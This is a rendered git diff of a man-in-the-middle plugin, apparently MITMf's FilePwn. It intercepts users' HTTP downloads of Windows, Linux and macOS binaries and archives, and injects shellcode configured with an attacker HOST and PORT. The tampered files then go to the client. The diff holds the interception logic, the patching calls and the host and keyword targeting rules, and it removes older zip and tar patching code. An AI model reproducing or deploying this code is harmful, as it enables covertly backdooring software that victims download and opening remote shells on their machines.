HOST=self.WindowsIntelx64['HOST'],
|
HOST=self.WindowsIntelx64['HOST'],
|
||||||
PORT=int(self.WindowsIntelx64['PORT']),
|
PORT=int(self.WindowsIntelx64['PORT']),
|
||||||
ADD_SECTION=add_section,
|
ADD_SECTION=add_section,
|
||||||
CAVE_JUMPING=cave_jumping,
|
CAVE_JUMPING=cave_jumping,
|
||||||
IMAGE_TYPE=self.WindowsType,
|
IMAGE_TYPE=self.WindowsType,
|
||||||
PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx64['PATCH_DLL']),
|
RUNAS_ADMIN=self.str2bool(self.WindowsIntelx86['RUNAS_ADMIN']),
|
||||||
SUPPLIED_SHELLCODE=self.WindowsIntelx64['SUPPLIED_SHELLCODE'],
|
PATCH_DLL=self.str2bool(self.WindowsIntelx64['PATCH_DLL']),
|
||||||
ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx64['ZERO_CERT']),
|
SUPPLIED_SHELLCODE=self.WindowsIntelx64['SUPPLIED_SHELLCODE'],
|
||||||
PATCH_METHOD=self.WindowsIntelx64['PATCH_METHOD'].lower()
|
ZERO_CERT=self.str2bool(self.WindowsIntelx64['ZERO_CERT']),
|
||||||
)
|
PATCH_METHOD=self.WindowsIntelx64['PATCH_METHOD'].lower(),
|
||||||
|
SUPPLIED_BINARY=self.WindowsIntelx64['SUPPLIED_BINARY'],
|
||||||
|
)
|
||||||
|
|
||||||
result = targetFile.run_this()
|
result = targetFile.run_this()
|
||||||
|
|
||||||
elif (machineType == 0x14c and
|
elif (machineType == 0x14c and
|
||||||
self.WindowsType.lower() in ['all', 'x86']):
|
self.WindowsType.lower() in ['all', 'x86']):
|
||||||
|
add_section = False
|
||||||
|
cave_jumping = False
|
||||||
|
# add_section wins for cave_jumping
|
||||||
|
# default is single for BDF
|
||||||
|
if self.WindowsIntelx86['PATCH_TYPE'].lower() == 'append':
|
||||||
|
add_section = True
|
||||||
|
elif self.WindowsIntelx86['PATCH_TYPE'].lower() == 'jump':
|
||||||
|
cave_jumping = True
|
||||||
|
|
||||||
|
# if automatic override
|
||||||
|
if self.WindowsIntelx86['PATCH_METHOD'].lower() == 'automatic':
|
||||||
|
cave_jumping = True
|
||||||
add_section = False
|
add_section = False
|
||||||
cave_jumping = False
|
|
||||||
#add_section wins for cave_jumping
|
|
||||||
#default is single for BDF
|
|
||||||
if self.WindowsIntelx86['PATCH_TYPE'].lower() == 'append':
|
|
||||||
add_section = True
|
|
||||||
elif self.WindowsIntelx86['PATCH_TYPE'].lower() == 'jump':
|
|
||||||
cave_jumping = True
|
|
||||||
|
|
||||||
# if automatic override
|
targetFile = pebin.pebin(FILE=binaryFile,
|
||||||
if self.WindowsIntelx86['PATCH_METHOD'].lower() == 'automatic':
|
OUTPUT=os.path.basename(binaryFile),
|
||||||
cave_jumping = True
|
SHELL=self.WindowsIntelx86['SHELL'],
|
||||||
|
HOST=self.WindowsIntelx86['HOST'],
|
||||||
|
PORT=int(self.WindowsIntelx86['PORT']),
|
||||||
|
ADD_SECTION=add_section,
|
||||||
|
CAVE_JUMPING=cave_jumping,
|
||||||
|
IMAGE_TYPE=self.WindowsType,
|
||||||
|
RUNAS_ADMIN=self.str2bool(self.WindowsIntelx86['RUNAS_ADMIN']),
|
||||||
|
PATCH_DLL=self.str2bool(self.WindowsIntelx86['PATCH_DLL']),
|
||||||
|
SUPPLIED_SHELLCODE=self.WindowsIntelx86['SUPPLIED_SHELLCODE'],
|
||||||
|
ZERO_CERT=self.str2bool(self.WindowsIntelx86['ZERO_CERT']),
|
||||||
|
PATCH_METHOD=self.WindowsIntelx86['PATCH_METHOD'].lower(),
|
||||||
|
SUPPLIED_BINARY=self.WindowsIntelx86['SUPPLIED_BINARY'],
|
||||||
|
XP_MODE=self.str2bool(self.WindowsIntelx86['XP_MODE'])
|
||||||
|
)
|
||||||
|
|
||||||
targetFile = pebin.pebin(FILE=binaryFile,
|
result = targetFile.run_this()
|
||||||
OUTPUT=os.path.basename(binaryFile),
|
|
||||||
SHELL=self.WindowsIntelx86['SHELL'],
|
|
||||||
HOST=self.WindowsIntelx86['HOST'],
|
|
||||||
PORT=int(self.WindowsIntelx86['PORT']),
|
|
||||||
ADD_SECTION=add_section,
|
|
||||||
CAVE_JUMPING=cave_jumping,
|
|
||||||
IMAGE_TYPE=self.WindowsType,
|
|
||||||
PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx86['PATCH_DLL']),
|
|
||||||
SUPPLIED_SHELLCODE=self.WindowsIntelx86['SUPPLIED_SHELLCODE'],
|
|
||||||
ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx86['ZERO_CERT']),
|
|
||||||
PATCH_METHOD=self.WindowsIntelx86['PATCH_METHOD'].lower()
|
|
||||||
)
|
|
||||||
|
|
||||||
result = targetFile.run_this()
|
|
||||||
|
|
||||||
elif binaryHeader[:4].encode('hex') == '7f454c46': # ELF
|
elif binaryHeader[:4].encode('hex') == '7f454c46': # ELF
|
||||||
|
|
||||||
|
@ -241,7 +425,7 @@ class FilePwn(Plugin):
|
||||||
targetFile.support_check()
|
targetFile.support_check()
|
||||||
|
|
||||||
if targetFile.class_type == 0x1:
|
if targetFile.class_type == 0x1:
|
||||||
#x86CPU Type
|
# x86CPU Type
|
||||||
targetFile = elfbin.elfbin(FILE=binaryFile,
|
targetFile = elfbin.elfbin(FILE=binaryFile,
|
||||||
OUTPUT=os.path.basename(binaryFile),
|
OUTPUT=os.path.basename(binaryFile),
|
||||||
SHELL=self.LinuxIntelx86['SHELL'],
|
SHELL=self.LinuxIntelx86['SHELL'],
|
||||||
|
@ -252,7 +436,7 @@ class FilePwn(Plugin):
|
||||||
)
|
)
|
||||||
result = targetFile.run_this()
|
result = targetFile.run_this()
|
||||||
elif targetFile.class_type == 0x2:
|
elif targetFile.class_type == 0x2:
|
||||||
#x64
|
# x64
|
||||||
targetFile = elfbin.elfbin(FILE=binaryFile,
|
targetFile = elfbin.elfbin(FILE=binaryFile,
|
||||||
OUTPUT=os.path.basename(binaryFile),
|
OUTPUT=os.path.basename(binaryFile),
|
||||||
SHELL=self.LinuxIntelx64['SHELL'],
|
SHELL=self.LinuxIntelx64['SHELL'],
|
||||||
|
@ -267,7 +451,7 @@ class FilePwn(Plugin):
|
||||||
targetFile = machobin.machobin(FILE=binaryFile, SUPPORT_CHECK=False)
|
targetFile = machobin.machobin(FILE=binaryFile, SUPPORT_CHECK=False)
|
||||||
targetFile.support_check()
|
targetFile.support_check()
|
||||||
|
|
||||||
#ONE CHIP SET MUST HAVE PRIORITY in FAT FILE
|
# ONE CHIP SET MUST HAVE PRIORITY in FAT FILE
|
||||||
|
|
||||||
if targetFile.FAT_FILE is True:
|
if targetFile.FAT_FILE is True:
|
||||||
if self.FatPriority == 'x86':
|
if self.FatPriority == 'x86':
|
||||||
|
@ -314,343 +498,180 @@ class FilePwn(Plugin):
|
||||||
)
|
)
|
||||||
result = targetFile.run_this()
|
result = targetFile.run_this()
|
||||||
|
|
||||||
self.patched.put(result)
|
return result
|
||||||
return
|
|
||||||
|
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
print 'Exception', str(e)
|
self.log.error("Exception in binaryGrinder {0}".format(e))
|
||||||
self.log.warning("EXCEPTION IN binaryGrinder {}".format(e))
|
|
||||||
return None
|
return None
|
||||||
|
|
||||||
def tar_files(self, aTarFileBytes, formatt):
|
def set_config(self):
|
||||||
"When called will unpack and edit a Tar File and return a tar file"
|
|
||||||
|
|
||||||
print "[*] TarFile size:", len(aTarFileBytes) / 1024, 'KB'
|
|
||||||
|
|
||||||
if len(aTarFileBytes) > int(self.userConfig['TAR']['maxSize']):
|
|
||||||
print "[!] TarFile over allowed size"
|
|
||||||
self.log.info("TarFIle maxSize met {}".format(len(aTarFileBytes)))
|
|
||||||
self.patched.put(aTarFileBytes)
|
|
||||||
return
|
|
||||||
|
|
||||||
with tempfile.NamedTemporaryFile() as tarFileStorage:
|
|
||||||
tarFileStorage.write(aTarFileBytes)
|
|
||||||
tarFileStorage.flush()
|
|
||||||
|
|
||||||
if not tarfile.is_tarfile(tarFileStorage.name):
|
|
||||||
print '[!] Not a tar file'
|
|
||||||
self.patched.put(aTarFileBytes)
|
|
||||||
return
|
|
||||||
|
|
||||||
compressionMode = ':'
|
|
||||||
if formatt == 'gz':
|
|
||||||
compressionMode = ':gz'
|
|
||||||
if formatt == 'bz':
|
|
||||||
compressionMode = ':bz2'
|
|
||||||
|
|
||||||
tarFile = None
|
|
||||||
try:
|
|
||||||
tarFileStorage.seek(0)
|
|
||||||
tarFile = tarfile.open(fileobj=tarFileStorage, mode='r' + compressionMode)
|
|
||||||
except tarfile.ReadError:
|
|
||||||
pass
|
|
||||||
|
|
||||||
if tarFile is None:
|
|
||||||
print '[!] Not a tar file'
|
|
||||||
self.patched.put(aTarFileBytes)
|
|
||||||
return
|
|
||||||
|
|
||||||
print '[*] Tar file contents and info:'
|
|
||||||
print '[*] Compression:', formatt
|
|
||||||
|
|
||||||
members = tarFile.getmembers()
|
|
||||||
for info in members:
|
|
||||||
print "\t", info.name, info.mtime, info.size
|
|
||||||
|
|
||||||
newTarFileStorage = tempfile.NamedTemporaryFile()
|
|
||||||
newTarFile = tarfile.open(mode='w' + compressionMode, fileobj=newTarFileStorage)
|
|
||||||
|
|
||||||
patchCount = 0
|
|
||||||
wasPatched = False
|
|
||||||
|
|
||||||
for info in members:
|
|
||||||
print "[*] >>> Next file in tarfile:", info.name
|
|
||||||
|
|
||||||
if not info.isfile():
|
|
||||||
print info.name, 'is not a file'
|
|
||||||
newTarFile.addfile(info, tarFile.extractfile(info))
|
|
||||||
continue
|
|
||||||
|
|
||||||
if info.size >= long(self.FileSizeMax):
|
|
||||||
print info.name, 'is too big'
|
|
||||||
newTarFile.addfile(info, tarFile.extractfile(info))
|
|
||||||
continue
|
|
||||||
|
|
||||||
# Check against keywords
|
|
||||||
keywordCheck = True
|
|
||||||
|
|
||||||
if type(self.tarblacklist) is str:
|
|
||||||
if self.tarblacklist.lower() in info.name.lower():
|
|
||||||
keywordCheck = True
|
|
||||||
|
|
||||||
else:
|
|
||||||
for keyword in self.tarblacklist:
|
|
||||||
if keyword.lower() in info.name.lower():
|
|
||||||
keywordCheck = True
|
|
||||||
continue
|
|
||||||
|
|
||||||
if keywordCheck is True:
|
|
||||||
print "[!] Tar blacklist enforced!"
|
|
||||||
self.log.info('Tar blacklist enforced on {}'.format(info.name))
|
|
||||||
continue
|
|
||||||
|
|
||||||
# Try to patch
|
|
||||||
extractedFile = tarFile.extractfile(info)
|
|
||||||
|
|
||||||
if patchCount >= int(self.userConfig['TAR']['patchCount']):
|
|
||||||
newTarFile.addfile(info, extractedFile)
|
|
||||||
else:
|
|
||||||
# create the file on disk temporarily for fileGrinder to run on it
|
|
||||||
with tempfile.NamedTemporaryFile() as tmp:
|
|
||||||
shutil.copyfileobj(extractedFile, tmp)
|
|
||||||
tmp.flush()
|
|
||||||
patchResult = self.binaryGrinder(tmp.name)
|
|
||||||
if patchResult:
|
|
||||||
patchCount += 1
|
|
||||||
file2 = "backdoored/" + os.path.basename(tmp.name)
|
|
||||||
print "[*] Patching complete, adding to tar file."
|
|
||||||
info.size = os.stat(file2).st_size
|
|
||||||
with open(file2, 'rb') as f:
|
|
||||||
newTarFile.addfile(info, f)
|
|
||||||
self.log.info("{} in tar patched, adding to tarfile".format(info.name))
|
|
||||||
os.remove(file2)
|
|
||||||
wasPatched = True
|
|
||||||
else:
|
|
||||||
print "[!] Patching failed"
|
|
||||||
with open(tmp.name, 'rb') as f:
|
|
||||||
newTarFile.addfile(info, f)
|
|
||||||
self.log.info("{} patching failed. Keeping original file in tar.".format(info.name))
|
|
||||||
if patchCount == int(self.userConfig['TAR']['patchCount']):
|
|
||||||
self.log.info("Met Tar config patchCount limit.")
|
|
||||||
|
|
||||||
# finalize the writing of the tar file first
|
|
||||||
newTarFile.close()
|
|
||||||
|
|
||||||
# then read the new tar file into memory
|
|
||||||
newTarFileStorage.seek(0)
|
|
||||||
ret = newTarFileStorage.read()
|
|
||||||
newTarFileStorage.close() # it's automatically deleted
|
|
||||||
|
|
||||||
if wasPatched is False:
|
|
||||||
# If nothing was changed return the original
|
|
||||||
print "[*] No files were patched forwarding original file"
|
|
||||||
self.patched.put(aTarFileBytes)
|
|
||||||
return
|
|
||||||
else:
|
|
||||||
self.patched.put(ret)
|
|
||||||
return
|
|
||||||
|
|
||||||
def zip_files(self, aZipFile):
|
|
||||||
"When called will unpack and edit a Zip File and return a zip file"
|
|
||||||
|
|
||||||
print "[*] ZipFile size:", len(aZipFile) / 1024, 'KB'
|
|
||||||
|
|
||||||
if len(aZipFile) > int(self.userConfig['ZIP']['maxSize']):
|
|
||||||
print "[!] ZipFile over allowed size"
|
|
||||||
self.log.info("ZipFIle maxSize met {}".format(len(aZipFile)))
|
|
||||||
self.patched.put(aZipFile)
|
|
||||||
return
|
|
||||||
|
|
||||||
tmpRan = ''.join(random.choice(string.ascii_lowercase + string.digits + string.ascii_uppercase) for _ in range(8))
|
|
||||||
tmpDir = '/tmp/' + tmpRan
|
|
||||||
tmpFile = '/tmp/' + tmpRan + '.zip'
|
|
||||||
|
|
||||||
os.mkdir(tmpDir)
|
|
||||||
|
|
||||||
with open(tmpFile, 'w') as f:
|
|
||||||
f.write(aZipFile)
|
|
||||||
|
|
||||||
zippyfile = zipfile.ZipFile(tmpFile, 'r')
|
|
||||||
|
|
||||||
#encryption test
|
|
||||||
try:
|
try:
|
||||||
zippyfile.testzip()
|
self.user_config = self.config['FilePwn']
|
||||||
|
self.host_blacklist = self.user_config['hosts']['blacklist']
|
||||||
|
self.host_whitelist = self.user_config['hosts']['whitelist']
|
||||||
|
self.keys_blacklist = self.user_config['keywords']['blacklist']
|
||||||
|
self.keys_whitelist = self.user_config['keywords']['whitelist']
|
||||||
|
except Exception as e:
|
||||||
|
self.log.error("Missing field from config file: {0}".format(e))
|
||||||
|
|
||||||
except RuntimeError as e:
|
def set_config_archive(self, ar):
|
||||||
if 'encrypted' in str(e):
|
try:
|
||||||
self.log.info('Encrypted zipfile found. Not patching.')
|
self.archive_type = ar['type']
|
||||||
self.patched.put(aZipFile)
|
self.archive_blacklist = self.user_config[self.archive_type]['blacklist']
|
||||||
return
|
self.archive_max_size = int(self.user_config[self.archive_type]['maxSize'])
|
||||||
|
self.archive_patch_count = int(self.user_config[self.archive_type]['patchCount'])
|
||||||
|
self.archive_params = ar
|
||||||
|
except Exception as e:
|
||||||
|
raise Exception("Missing {0} section from config file".format(e))
|
||||||
|
|
||||||
print "[*] ZipFile contents and info:"
|
def hosts_whitelist_check(self, req_host):
|
||||||
|
if self.host_whitelist.lower() == 'all':
|
||||||
|
self.patchIT = True
|
||||||
|
|
||||||
for info in zippyfile.infolist():
|
elif type(self.host_whitelist) is str:
|
||||||
print "\t", info.filename, info.date_time, info.file_size
|
if self.host_whitelist.lower() in req_host.lower():
|
||||||
|
self.patchIT = True
|
||||||
zippyfile.extractall(tmpDir)
|
self.log.info("Host whitelist hit: {0}, HOST: {1}".format(self.host_whitelist, req_host))
|
||||||
|
elif req_host.lower() in self.host_whitelist.lower():
|
||||||
patchCount = 0
|
self.patchIT = True
|
||||||
|
self.log.info("Host whitelist hit: {0}, HOST: {1} ".format(self.host_whitelist, req_host))
|
||||||
wasPatched = False
|
|
||||||
|
|
||||||
for info in zippyfile.infolist():
|
|
||||||
print "[*] >>> Next file in zipfile:", info.filename
|
|
||||||
|
|
||||||
if os.path.isdir(tmpDir + '/' + info.filename) is True:
|
|
||||||
print info.filename, 'is a directory'
|
|
||||||
continue
|
|
||||||
|
|
||||||
#Check against keywords
|
|
||||||
keywordCheck = True
|
|
||||||
|
|
||||||
if type(self.zipblacklist) is str:
|
|
||||||
if self.zipblacklist.lower() in info.filename.lower():
|
|
||||||
keywordCheck = True
|
|
||||||
|
|
||||||
else:
|
|
||||||
for keyword in self.zipblacklist:
|
|
||||||
if keyword.lower() in info.filename.lower():
|
|
||||||
keywordCheck = True
|
|
||||||
continue
|
|
||||||
|
|
||||||
if keywordCheck is True:
|
|
||||||
print "[!] Zip blacklist enforced!"
|
|
||||||
self.log.info('Zip blacklist enforced on {}'.format(info.filename))
|
|
||||||
continue
|
|
||||||
|
|
||||||
patchResult = self.binaryGrinder(tmpDir + '/' + info.filename)
|
|
||||||
|
|
||||||
if patchResult:
|
|
||||||
patchCount += 1
|
|
||||||
file2 = "backdoored/" + os.path.basename(info.filename)
|
|
||||||
print "[*] Patching complete, adding to zip file."
|
|
||||||
shutil.copyfile(file2, tmpDir + '/' + info.filename)
|
|
||||||
self.log.info("{} in zip patched, adding to zipfile".format(info.filename))
|
|
||||||
os.remove(file2)
|
|
||||||
wasPatched = True
|
|
||||||
else:
|
|
||||||
print "[!] Patching failed"
|
|
||||||
self.log.info("{} patching failed. Keeping original file in zip.".format(info.filename))
|
|
||||||
|
|
||||||
print '-' * 10
|
|
||||||
|
|
||||||
if patchCount >= int(self.userConfig['ZIP']['patchCount']): # Make this a setting.
|
|
||||||
self.log.info("Met Zip config patchCount limit.")
|
|
||||||
break
|
|
||||||
|
|
||||||
zippyfile.close()
|
|
||||||
|
|
||||||
zipResult = zipfile.ZipFile(tmpFile, 'w', zipfile.ZIP_DEFLATED)
|
|
||||||
|
|
||||||
print "[*] Writing to zipfile:", tmpFile
|
|
||||||
|
|
||||||
for base, dirs, files in os.walk(tmpDir):
|
|
||||||
for afile in files:
|
|
||||||
filename = os.path.join(base, afile)
|
|
||||||
print '[*] Writing filename to zipfile:', filename.replace(tmpDir + '/', '')
|
|
||||||
zipResult.write(filename, arcname=filename.replace(tmpDir + '/', ''))
|
|
||||||
|
|
||||||
zipResult.close()
|
|
||||||
#clean up
|
|
||||||
shutil.rmtree(tmpDir)
|
|
||||||
|
|
||||||
with open(tmpFile, 'rb') as f:
|
|
||||||
tempZipFile = f.read()
|
|
||||||
os.remove(tmpFile)
|
|
||||||
|
|
||||||
if wasPatched is False:
|
|
||||||
print "[*] No files were patched forwarding original file"
|
|
||||||
self.patched.put(aZipFile)
|
|
||||||
return
|
|
||||||
else:
|
else:
|
||||||
self.patched.put(tempZipFile)
|
for keyword in self.host_whitelist:
|
||||||
return
|
if keyword.lower() in req_host.lower():
|
||||||
|
self.patchIT = True
|
||||||
|
self.log.info("Host whitelist hit: {0}, HOST: {1} ".format(self.host_whitelist, req_host))
|
||||||
|
break
|
||||||
|
|
||||||
|
def keys_whitelist_check(self, req_url, req_host):
|
||||||
|
# Host whitelist check takes precedence
|
||||||
|
if self.patchIT is False:
|
||||||
|
return None
|
||||||
|
|
||||||
|
if self.keys_whitelist.lower() == 'all':
|
||||||
|
self.patchIT = True
|
||||||
|
elif type(self.keys_whitelist) is str:
|
||||||
|
if self.keys_whitelist.lower() in req_url.lower():
|
||||||
|
self.patchIT = True
|
||||||
|
self.log.info("Keyword whitelist hit: {0}, PATH: {1}".format(self.keys_whitelist, req_url))
|
||||||
|
elif req_host.lower() in [x.lower() for x in self.keys_whitelist]:
|
||||||
|
self.patchIT = True
|
||||||
|
self.log.info("Keyword whitelist hit: {0}, PATH: {1}".format(self.keys_whitelist, req_url))
|
||||||
|
else:
|
||||||
|
for keyword in self.keys_whitelist:
|
||||||
|
if keyword.lower() in req_url.lower():
|
||||||
|
self.patchIT = True
|
||||||
|
self.log.info("Keyword whitelist hit: {0}, PATH: {1}".format(self.keys_whitelist, req_url))
|
||||||
|
break
|
||||||
|
|
||||||
|
def keys_backlist_check(self, req_url, req_host):
|
||||||
|
if type(self.keys_blacklist) is str:
|
||||||
|
if self.keys_blacklist.lower() in req_url.lower():
|
||||||
|
self.patchIT = False
|
||||||
|
self.log.info("Keyword blacklist hit: {0}, PATH: {1}".format(self.keys_blacklist, req_url))
|
||||||
|
else:
|
||||||
|
for keyword in self.keys_blacklist:
|
||||||
|
if keyword.lower() in req_url.lower():
|
||||||
|
self.patchIT = False
|
||||||
|
self.log.info("Keyword blacklist hit: {0}, PATH: {1}".format(self.keys_blacklist, req_url))
|
||||||
|
break
|
||||||
|
|
||||||
|
def hosts_blacklist_check(self, req_host):
|
||||||
|
if type(self.host_blacklist) is str:
|
||||||
|
if self.host_blacklist.lower() in req_host.lower():
|
||||||
|
self.patchIT = False
|
||||||
|
self.log.info("Host Blacklist hit: {0} : HOST: {1} ".format(self.host_blacklist, req_host))
|
||||||
|
elif req_host.lower() in [x.lower() for x in self.host_blacklist]:
|
||||||
|
self.patchIT = False
|
||||||
|
self.log.info("Host Blacklist hit: {0} : HOST: {1} ".format(self.host_blacklist, req_host))
|
||||||
|
else:
|
||||||
|
for host in self.host_blacklist:
|
||||||
|
if host.lower() in req_host.lower():
|
||||||
|
self.patchIT = False
|
||||||
|
self.log.info("Host Blacklist hit: {0} : HOST: {1} ".format(self.host_blacklist, req_host))
|
||||||
|
break
|
||||||
|
|
||||||
def parse_target_config(self, targetConfig):
|
def parse_target_config(self, targetConfig):
|
||||||
for key, value in targetConfig.iteritems():
|
for key, value in targetConfig.items():
|
||||||
if hasattr(self, key) is False:
|
if hasattr(self, key) is False:
|
||||||
setattr(self, key, value)
|
setattr(self, key, value)
|
||||||
self.log.debug("Settings Config {}: {}".format(key, value))
|
self.log.debug("Settings Config {0}: {1}".format(key, value))
|
||||||
|
|
||||||
elif getattr(self, key, value) != value:
|
elif getattr(self, key, value) != value:
|
||||||
|
|
||||||
if value == "None":
|
if value == "None":
|
||||||
continue
|
continue
|
||||||
|
|
||||||
#test if string can be easily converted to dict
|
# test if string can be easily converted to dict
|
||||||
if ':' in str(value):
|
if ':' in str(value):
|
||||||
for tmpkey, tmpvalue in dict(value).iteritems():
|
for tmpkey, tmpvalue in dict(value).items():
|
||||||
getattr(self, key, value)[tmpkey] = tmpvalue
|
getattr(self, key, value)[tmpkey] = tmpvalue
|
||||||
self.log.debug("Updating Config {}: {}".format(tmpkey, tmpvalue))
|
self.log.debug("Updating Config {0}: {1}".format(tmpkey, tmpvalue))
|
||||||
|
|
||||||
else:
|
else:
|
||||||
setattr(self, key, value)
|
setattr(self, key, value)
|
||||||
self.log.debug("Updating Config {}: {}".format(key, value))
|
self.log.debug("Updating Config {0}: {1}".format(key, value))
|
||||||
|
|
||||||
def response(self, response, request, data):
|
def response(self, response, request, data):
|
||||||
|
|
||||||
content_header = response.headers['Content-Type']
|
content_header = response.headers['content-type']
|
||||||
content_length = int(response.headers['Content-Length'])
|
|
||||||
client_ip = request.client.getClientIP()
|
client_ip = request.client.getClientIP()
|
||||||
|
host = request.headers['host']
|
||||||
|
|
||||||
for target in self.userConfig['targets'].keys():
|
try:
|
||||||
|
content_length = int(response.headers['content-length'])
|
||||||
|
except KeyError:
|
||||||
|
content_length = None
|
||||||
|
|
||||||
|
for target in self.user_config['targets'].keys():
|
||||||
if target == 'ALL':
|
if target == 'ALL':
|
||||||
self.parse_target_config(self.userConfig['targets']['ALL'])
|
self.parse_target_config(self.user_config['targets']['ALL'])
|
||||||
|
|
||||||
if target in request.headers['host']:
|
if target in request.headers['host']:
|
||||||
self.parse_target_config(self.userConfig['targets'][target])
|
self.parse_target_config(self.user_config['targets'][target])
|
||||||
|
|
||||||
if content_header in self.zipMimeTypes:
|
self.hosts_whitelist_check(host)
|
||||||
|
self.keys_whitelist_check(request.uri, host)
|
||||||
|
self.keys_backlist_check(request.uri, host)
|
||||||
|
self.hosts_blacklist_check(host)
|
||||||
|
|
||||||
if self.bytes_have_format(data, 'zip'):
|
if content_length and (content_length >= long(self.FileSizeMax)):
|
||||||
self.clientlog.info("Detected supported zip file type!", extra=request.clientInfo)
|
self.clientlog.info("Not patching over content-length, forwarding to user", extra=request.clientInfo)
|
||||||
|
self.patchIT = False
|
||||||
|
|
||||||
process = multiprocessing.Process(name='zip', target=self.zip_files, args=(data,))
|
if self.patchIT is False:
|
||||||
process.daemon = True
|
self.clientlog.info("Config did not allow patching", extra=request.clientInfo)
|
||||||
process.start()
|
|
||||||
#process.join()
|
|
||||||
bd_zip = self.patched.get()
|
|
||||||
|
|
||||||
if bd_zip:
|
else:
|
||||||
self.clientlog.info("Patching complete, forwarding to client", extra=request.clientInfo)
|
|
||||||
return {'response': response, 'request': request, 'data': bd_zip}
|
|
||||||
|
|
||||||
|
mime_type = magic.from_buffer(data, mime=True)
|
||||||
|
|
||||||
|
if mime_type in self.binaryMimeType['mimes']:
|
||||||
|
tmp = tempfile.NamedTemporaryFile()
|
||||||
|
tmp.write(data)
|
||||||
|
tmp.flush()
|
||||||
|
tmp.seek(0)
|
||||||
|
|
||||||
|
patchResult = self.binaryGrinder(tmp.name)
|
||||||
|
if patchResult:
|
||||||
|
self.clientlog.info("Patching complete, forwarding to user", extra=request.clientInfo)
|
||||||
|
|
||||||
|
bd_file = os.path.join('backdoored', os.path.basename(tmp.name))
|
||||||
|
with open(bd_file, 'r+b') as file2:
|
||||||
|
data = file2.read()
|
||||||
|
file2.close()
|
||||||
|
|
||||||
|
os.remove(bd_file)
|
||||||
|
else:
|
||||||
|
self.clientlog.error("Patching failed", extra=request.clientInfo)
|
||||||
|
|
||||||
|
# add_try to delete here
|
||||||
|
tmp.close()
|
||||||
else:
|
else:
|
||||||
for tartype in ['gz','bz','tar']:
|
for archive in self.archiveTypes:
|
||||||
if self.bytes_have_format(data, tartype):
|
if mime_type in archive['mimes'] and self.str2bool(self.CompressedFiles) is True:
|
||||||
self.clientlog.info("Detected supported tar file type!", extra=request.clientInfo)
|
try:
|
||||||
|
self.set_config_archive(archive['params'])
|
||||||
|
data = self.inject(data)
|
||||||
|
except Exception as exc:
|
||||||
|
self.clientlog.error(exc, extra=request.clientInfo)
|
||||||
|
self.clientlog.warning("Returning original file", extra=request.clientInfo)
|
||||||
|
|
||||||
process = multiprocessing.Process(name='tar_files', target=self.tar_files, args=(data,))
|
|
||||||
process.daemon = True
|
|
||||||
process.start()
|
|
||||||
#process.join()
|
|
||||||
bd_tar = self.patched.get()
|
|
||||||
|
|
||||||
if bd_tar:
|
|
||||||
self.clientlog.info("Patching complete, forwarding to client!", extra=request.clientInfo)
|
|
||||||
return {'response': response, 'request': request, 'data': bd_tar}
|
|
||||||
|
|
||||||
elif (content_header in self.binaryMimeTypes) and (content_length <= self.FileSizeMax):
|
|
||||||
for bintype in ['pe','elf','fatfile','machox64','machox86']:
|
|
||||||
if self.bytes_have_format(data, bintype):
|
|
||||||
self.clientlog.info("Detected supported binary type ({})!".format(bintype), extra=request.clientInfo)
|
|
||||||
fd, tmpFile = mkstemp()
|
|
||||||
with open(tmpFile, 'w') as f:
|
|
||||||
f.write(data)
|
|
||||||
|
|
||||||
process = multiprocessing.Process(name='binaryGrinder', target=self.binaryGrinder, args=(tmpFile,))
|
|
||||||
process.daemon = True
|
|
||||||
process.start()
|
|
||||||
#process.join()
|
|
||||||
patchb = self.patched.get()
|
|
||||||
|
|
||||||
if patchb:
|
|
||||||
bd_binary = open("backdoored/" + os.path.basename(tmpFile), "rb").read()
|
|
||||||
os.remove('./backdoored/' + os.path.basename(tmpFile))
|
|
||||||
self.clientlog.info("Patching complete, forwarding to client", extra=request.clientInfo)
|
|
||||||
return {'response': response, 'request': request, 'data': bd_binary}
|
|
||||||
else:
|
|
||||||
self.clientInfo.info("Patching Failed!", extra=request.clientInfo)
|
|
||||||
|
|
||||||
self.clientlog.debug("File is not of supported content-type: {}".format(content_header), extra=request.clientInfo)
|
|
||||||
return {'response': response, 'request': request, 'data': data}
|
return {'response': response, 'request': request, 'data': data}
|
|
@ -1,4 +1,5 @@
|
||||||
git+git://github.com/kti/python-netfilterqueue
|
git+git://github.com/kti/python-netfilterqueue
|
||||||
|
git+git://github.com/gorakhargosh/watchdog
|
||||||
pycrypto>=2.6
|
pycrypto>=2.6
|
||||||
pyasn1>=0.1.7
|
pyasn1>=0.1.7
|
||||||
cryptography
|
cryptography
|
||||||
|
@ -17,7 +18,7 @@ Flask
|
||||||
dnspython
|
dnspython
|
||||||
beautifulsoup4
|
beautifulsoup4
|
||||||
capstone
|
capstone
|
||||||
|
python-magic
|
||||||
msgpack-python
|
msgpack-python
|
||||||
watchdog
|
|
||||||
requests
|
requests
|
||||||
pypcap
|
pypcap
|
Loading…
Add table
Add a link
Reference in a new issue